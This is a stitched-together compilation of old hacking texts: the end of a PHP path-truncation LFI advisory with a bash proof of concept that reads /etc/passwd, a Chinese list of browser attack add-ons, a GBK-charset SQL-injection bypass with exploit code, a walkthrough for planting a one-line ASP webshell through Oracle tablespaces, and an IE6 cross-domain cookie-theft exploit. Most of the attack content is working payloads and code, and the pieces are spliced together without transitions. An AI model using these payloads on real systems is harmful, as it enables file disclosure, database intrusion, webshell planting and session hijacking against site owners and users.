By the way: six is the number of bytes written to "shell.php".

- Path truncation POC

We provide both a standard vulnerable page and an "attack" utility,
tweak the "TWEAK ME" line to use the payload of your choice.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

$ cat poc_path_truncation.php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

$ cat poc_path_truncation.sh
#!/bin/bash
url=”http://localhost/poc_file_truncation.php?class=unexisting/../../../../../etc/passwd/.”
n_iterations=3000
for ((repetitions=1; repetitions< =n_iterations; repetitions+=1)); do
if [ "`curl -kis $url | grep "^root:x"`" != "" ]; then
echo -en "[$repetitions]";
else
echo -en ".";
fi
url+="/."; # TWEAK ME
done

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

At a certain lenght (2019 on our test system) it should start printing
numbers inside square brackets, that means that /etc/passwd has been
succesfully included.

- Windows path truncation POC

On Windows the universal path truncation token is "./" and not "/.".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

include('file.est'.str_repeat("./",4096).'.php');
include('/file.est'.str_repeat("./",4096).'.php');
include('localnonexistent/../../../../../file.est'.str_repeat("./",4096).'.php');
include('localexistent/../../../../.././file.est'.str_repeat("./",4096).'.php');
include('/wamp/../../../../.././file.est'.str_repeat("./",4096).'.php');
?>

–8< --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

This means that "file.est./././[OMIT]./.php" will work, while the
already seen "file.est/././[OMIT]././.php" will not. Please keep this
in mind when working with Windows machines.

The tokenizer is defined as follows:

TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\"

Another payload that works for the truncation attack is ".\" but we
weren't able to find something equivalent to the "/etc/passwd/." on
Unix. Feel curious and want to spend more time on the issue? (-;

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

include('file.ext'.str_repeat(".\\",4096).'.php');
include('/file.ext'.str_repeat(".\\",4096).'.php');
include('localnonexistent/../../../../../file.ext'.str_repeat(".\\",4096).'.php');
include('localexistent/../../../../.././file.ext'.str_repeat(".\\",4096).'.php');
include('/wamp/../../../../.././file.ext'.str_repeat(".\\",4096).'.php');
?>

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

IX) Conclusions

Path normalization can be used for a number of goals including
blacklist check bypass on isset, write and read filesystem operations
plus signature evasion.

Path truncation can be used in place of nullbyte poisoning if an
include_path setting with absolute directories is present in order to
archieve LFI (and RFI [5]) attacks.

X) References

[1] http://sla.ckers.org/forum/read.php?16,25706,25736#msg-25736
[2] http://pragmatk.blogspot.com/2009/01/lfi-fun.html
[3] http://pragmatk.blogspot.com/2009/01/lfi-fun-2.html
[4] http://www.ush.it/team/ush/hack-phpfs/log_ascii_kuza_07-04-08.txt
[5]

http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

[6]

http://verens.com/archives/2008/10/13/security-hole-for-files-with-a-dot-at-the-end/

I was reading the Apache source to try spot the problem, and found
the area where it happens – it’s in the file “http/mod_mime.c”.
The function “find_ct()” extracts the extension for the server to
use. Unfortunately, it ignores all extensions it does not understand,
so it’s not just a case of “test.php.” being parsed as “.php”, but
also “test.php.fdabsfgdsahfj” and other similar rubbish files!
[7] http://download.suhosin.org/suhosin-patch-5.2.8-0.9.6.3.patch.gz

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

Credits (Out of band)

This article has been bought to you by ush.it team. Francesco “ascii”
Ongaro and Giovanni “evilaliv3″ Pellerano are the ones who spent most
hours on it with the precious help of Antonio “s4tan” Parata, Stefano
“Wisec” Di Paola, Alex “kuza55″, Alessandro “Jekil” Tanasi and many
other friends. A special greeting is for Florin “Slippery” Iamandi, a
men behind, in a way or another, many of the productions of ush.it.

Thanks everybody, you all make me feel at home!

Francesco “ascii” Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

Giovanni “evilaliv3″ Pellerano
web site: http://www.evilaliv3.org/
mail: giovanni.pellerano AT evilaliv3 DOT org

–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–

Legal Notices

Copyright (c) 2009 Francesco “ascii” Ongaro

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.

Disclaimer: The information in the article is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

# milw0rm.com [2009-02-10]

　　2. User Agent Switcher 修改浏览器的User Agent，可以用来XSS。

　　3. RefControl 修改Referer引用，也可以用来XSS或者突破一些防盗链。关于Referer XSS的可以参考利用雅虎站长工具跨站给管理员挂马。

　　4.Live HTTP Headers 记录本地的Get和Post数据，并可修改数据后重新提交。

　　5. Poster 用来Post和Get数据。

　　6. HackBar 小工具包，包含一些常用的工具。(SQL injection,XSS,加密等)

　　7. XSS-Me &SQL Inject-Me&Access-Me 分别用来检测XSS，SQL Inject和Access缺陷。

　　8. Firebug 可以编辑、测试和实时观察任何页面中的 CSS，HTML，和JavaScript，控制查看的数据和 HTTP/HTTPS 的消息头和 POST 参数,还有 DOM Inspector 来检查任何的 HTM L或 CSS 组成。

　　9. Web Developer

其实这东西国内少数黑客早已知道，只不过没有共享公布而已。有些人是不愿共享，宁愿烂在地里，另外的一些则是用来牟利。
该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时，0xbf27本身不是一个有效的GBK字符，但经过 addslashes() 转换后

变为0xbf5c27，前面的0xbf5c是个有效的GBK字符，所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理，结果漏洞就触

发了。

mysql_real_escape_string() 也存在相同的问题，只不过相比 addslashes() 它考虑到了用什么字符集来处理，因此可以用相

应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。

方法一：

改变mysql配置文件my.cnf

CODE:
[client]
default-character-set=GBK
方法二：
在建立连接时使用
CODE:
SET CHARACTER SET ‘GBK’
例：mysql_query(“SET CHARACTER SET ‘gbk’”, $c);
问题是方法二在改变字符集时mysql_real_escape_string() 并不知道而使用默认字符集处理从而造成和 addslashes() 一样的漏洞
下面是来自http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html的测试代码

<!--p
 
$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);
 
// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);
 
// create demo table
mysql_query("CREATE TABLE users (
    username VARCHAR(32) PRIMARY KEY,
    password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
 
// now the exploit code
$_POST['username'] = chr(0xbf) . chr(0x27) . ' OR username = username /*';
$_POST['password'] = 'anything'; 
 
// Proper escaping, we should be safe, right?
$user = mysql_real_escape_string($_POST['username'], $c);
$passwd = mysql_real_escape_string($_POST['password'], $c);
 
$sql = "SELECT * FROM  users WHERE  username = '{$user}' AND password = '{$passwd}'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
 
-->

纵观以上两种触发漏洞的关键是addslashes() 在Mysql配置为GBK时就可以触发漏洞，而mysql_real_escape_string() 是在不知
道字符集的情况下用默认字符集处理产生漏洞的。
下面再来分析下国内最近漏洞产生的原因。
问题出现在一些字符转换函数上，例如mb_convert_encoding()和iconv()等。
发布在80sec上的说明说0xc127等一些字符再被addslashes() 处理成0xc15c27后，又经过一些字符转换函数变为0×808027，而使得经过
addslashes() 加上的”\”失效，这样单引号就又发挥作用了。这就造成了字符注入漏洞。
根据80sec的说明，iconv()没有该问题，但经我用0xbf27测试
$id1=mb_convert_encoding($_GET['id'], ‘utf-8′, ‘gbk’);
$id2=iconv(‘gbk//IGNORE’, ‘utf-8′, $_GET['id']);
$id3=iconv(‘gbk’, ‘utf-8′, $_GET['id']);
这些在GPC开启的情况下还是会产生字符注入漏洞，测试代码如下：

<!--p
 
$c = mysql_connect("localhost", "user", "pass");
mysql_select_db("database", $c);
 
// change our character set
mysql_query("SET CHARACTER SET 'gbk'", $c);
 
// create demo table
mysql_query("CREATE TABLE users (
    username VARCHAR(32) PRIMARY KEY,
    password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);
 
// now the exploit code
//$id1=mb_convert_encoding($_GET['id'], 'utf-8', 'gbk');
$id2=iconv('gbk//IGNORE', 'utf-8', $_GET['id']);
//$id3=iconv('gbk', 'utf-8', $_GET['id']);
 
$sql = "SELECT * FROM  users WHERE  username = '{$id2}' AND password = 'password'";
$res = mysql_query($sql, $c);
echo mysql_num_rows($res); // will print 2, indicating that we were able to fetch all records
 
-->

测试情况 http://www.safe3.cn/test.php?id=%bf%27 OR username = username /*

后记，这里不光是%bf，其它许多字符也可以造成同样漏洞，大家可以自己做个测试的查下，这里有zwell文章提到的一个分析
http://hackme.ntobjectives.com/sql_inject/login_addslashes.php 。编码的问题在xss中也有利用价值，

其实 类似ORACLE 这样强大的数据库，真没必要用到这么土的办法

SQLJ    存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？

那 也可以 使用以下我说的这个方式

SQL> create tablespace kjtest datafile ‘e:\website\kj.asp’ size 100k nologging ;

表空间已创建。

这里记住了 100K为ORACLE 表空间最小的单位，如果你的一句话SHELL比较大 那可以200K比较稳妥

但是最终建议一句话一定要最最简洁

SQL> CREATE TABLE WEBSHELL(C varchar2(100)) tablespace kjtest;

表已创建。

一般用 VARCHAR类型已经可以 ，表空间太小了 ，所以不可以 为 CLOB或者 BLOB类型。

SQL> insert into WEBSHELL values(‘<%execute request(“kj021320″)%>’);

已创建 1 行。

SQL> commit;

提交完成。

提交完成之后就 OK？ NO~ 因为数据还没有被 DBWn 进程刷到文件呢. 所以需要同步一下CKPT以及OFFLINE当前表空间

SQL> alter tablespace kjtest offline;

表空间已更改。

到这里 你的 一句话SHELL代码已经 写到 那个文件了

你会发现有这样的 <%execute request(“kj021320″)%> Z Z   的 代码

一句话shell已经OK了

最后使用后记得吧 表空间删除

SQL> drop tablespace kjtest including contents;

表空间已删除。

1.来自伪协议的呼唤

JAVASCRIPT里大家都频繁使用window对象，window对象代表的就是浏览器的窗口，我们
就来测试下window对象的open方法，尝试让新开的窗口执行伪协议。

在本机搭建一个WEB服务器，开始做下实验：

用各个浏览器浏览 http://127.0.0.1/test.htm ，下面是test.htm的脚本内容：

    <script>   
    x=window.open("about:blank");
    x.location="javascript:alert(document.domain)"
    </script>

结果是：

IE6：执行了伪协议，认为弹出窗口的域是127.0.0.1。
IE7：执行了伪协议，认为弹出窗口的域是127.0.0.1。
Firefox：执行了伪协议,认为还没有域为NULL。

Firefox这里对于这个接口可能也有个BUG，对于IP地址的弹窗Firefox没有辨认出域，但
是在实际绑定域名的情况下还是辨认出了域。

为了下面的部分方便理解，我把这里弹窗的关系给简称下，原来的窗口叫父页，弹出窗口
叫子页，实验过后我们证明了:

父页和子页都在同一个域里，父页可以重定向子页的URL地址，甚至执行伪协议。

2.父页和子页的关系

如果父页让子页访问其他域后，父页和子页是否就脱离关系了呢？

继续测试，用各个浏览器浏览 http://127.0.0.1/test2.htm ，下面是test2.htm的脚本
内容：

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com" //访问163网站
    setTimeout(function(){
        x.location="http://127.0.0.1";
    },5000)  //5秒后重定向到127.0.0.1
    </script>

这次IE6、IE7、Firefox都达成了一致，实验的结果是子页访问了163网站，5秒然后又跳
回了127.0.0.1。

所以就算是子页在访问了其他域后，还是会受父页的控制。

3.域与域之间的牵绊

如果父页让子页访问某个域后，再执行伪协议会有什么效果？

用各个浏览器浏览 http://127.0.0.1/test3.htm，下面是test3.htm的脚本内容：

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

结果是：

IE6：没有反应。
IE7：报错，拒绝访问。
Firefox：报错，alert没有定义。

这些信息明显的说明，如果子页和父页不在同一个域里，浏览器是不允许父页控制子页
执行伪协议脚本的。

为了进一步验证，我们让子页打开同一个域里的页面测试：

用各个浏览器浏览 http://127.0.0.1/test4.htm，下面是test4.htm的脚本内容：

    <script> 
    document.cookie="xss:true"  //给本域设置一个COOKIE为xss:true
    x=window.open("about:blank");
    x.location="http://127.0.0.1"
    setTimeout(function(){
        x.location="javascript:alert(document.cookie)";
    },5000)
    </script>

结果IE6、IE7、Firefox都顺利的弹出了COOKIE值，说明如果子页和父页在同一个域里，
浏览器是允许父页控制子页执行伪协议脚本的。

4.安全上的差异

父页和子页这种微妙的关系，到这里就开始引发安全问题了，PDP等大牛在分析鬼页的时
候给出了EXP:

    javascript:x=open("http://hackademix.net/");setInterval(function(){try{x.frames[0].location={toString:function(){return "http://www.sirdarckcat.net/caballero-listener.html";}}}catch(e){}},5000);void(1);

EXP按上面三部分的概念解释是：

父页是A域，父页指定子页访问B域内一个带框架的页面，父页就能够控制B域页面内框架
的URL地址，这个就是典型的跨域操作了。

鬼页能够跨域操作框架的关键是window.frames[0]方法没有受到域的限制，第二个是让
location指定的地址看起来像个对象而不是参数。

我们按照鬼页的思路，继续在第3部分的基础上测试下去,将location指定的地址使用
new String()对象处理。

用各个浏览器浏览 http://127.0.0.1/test5.htm，下面是test5.htm的脚本内容：

    <script>   
    x=window.open("about:blank");
    x.location="http://www.163.com"；
    setTimeout(function(){
        x.location=new String("javascript:alert(document.cookie)")
    },5000)
    </script>

IE6：弹出COOKIE。
IE7：报错，拒绝访问。
Firefox：报错，alert没有定义。

结果是IE6奇迹般的弹出了COOKIE，我们做到了跨域执行脚本。

5.灾难性的后果

到这里我们发现了一个IE6的0DAY，一定程度上这个跨域安全问题是灾难性的，如下面的
EXP：

    <a href="">IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open("http://www.phpwind.net");
        setTimeout(function(){
            x.location=new String("javascript:alert(document.cookie)")
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document .links.length;i++) { 
            document.links[i].href="javascript:win()"
        }
    }
    </script>
</document></script>

点击链接后，马上得到了PHPWIND论坛的COOKIE，这就意味着黑客通过类似的攻击可以得
到你访问过的任意网站的COOKIE，然后劫持你的会话。

这样的漏洞相当于一个没有域限制的XSS漏洞，几乎是无法防御的，网站只能进一步的加
强客户端的会话安全，如使用SSL加密连接、设置安全COOKIE加上HTTPONLY参数、给敏感的
请求操作加上水印等。

6.总结

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏，没有考虑清楚不
同域有继承关系的window对象操作后的变化，只是对window对象的一些方法的参数做了类似
数据类型的限制，导致最后绕过限制跨域执行了脚本。

从这个漏洞我们也可以看出IE7的一些新的安全特性，通过继承关系的window对象操作
来跨域执行脚本伪协议最后是判断了域的，IE7已经开始防范类似的攻击。

但是这里并没有在本质上解决跨域安全问题，IE7只防范了跨域执行脚本，对于其他跨域
的操作仍然是放行的，所以鬼页在IE7下可以跨域操作框架URL，而Firefox却没有存在相同的
问题，说明不同浏览器在安全的考虑上也是存在很多差异的。

针对IE我又测试了其他对象方法，发现很多都被限制住了，但不排除还有同样的问题存
在。按照类似的思路，大家可以继续尝试挖掘浏览器的一些跨域漏洞。

最后感谢HI群里共同讨论的朋友。

7.参考

[1] Browser”s Ghost Busters: http://sirdarckcat.blogspot.com/2008/05/browsers-ghost-busters.html
[2] Ghost Busters: http://www.gnucitizen.org/blog/ghost-busters/

-EOF-